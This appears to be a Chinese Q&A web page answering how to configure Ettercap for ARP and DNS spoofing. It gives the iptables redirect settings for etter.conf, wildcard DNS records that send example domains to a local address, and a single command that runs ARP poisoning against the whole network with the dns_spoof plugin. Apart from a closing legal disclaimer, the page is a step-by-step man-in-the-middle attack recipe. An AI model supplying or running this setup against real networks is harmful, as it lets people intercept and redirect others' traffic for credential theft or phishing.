做arp和dns欺骗etc/ettercap/etter.dns怎么配置
时间: 2023-12-21 10:05:28 浏览: 181
Ettercap可以通过欺骗ARP和DNS来进行中间人攻击。下面是一个简单的配置示例:
1. 欺骗ARP
首先,需要在ettercap配置文件中启用ARP欺骗。打开/etc/ettercap/etter.conf文件,找到以下行:
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
取消注释并将其更改为:
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -j REDIRECT"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -j REDIRECT"
这将启用IPTables规则以将所有流量重定向到ettercap。
2. 欺骗DNS
接下来,需要配置ettercap以欺骗DNS。打开/etc/ettercap/etter.dns文件,将以下内容添加到文件底部:
*.example.com A 192.168.1.100
*.example.net A 192.168.1.100
这将将所有.example.com和.example.net域名解析到192.168.1.100地址。
3. 启动ettercap
现在可以启动ettercap了。打开终端并输入以下命令:
sudo ettercap -Tq -M arp:remote -P dns_spoof ////
这将使用ARP欺骗和DNS欺骗启动ettercap。
请注意,中间人攻击是非法的,在未经授权的情况下进行可能会导致严重后果。在进行此操作之前,请确保您了解有关此类攻击的法律和道德问题。
阅读全文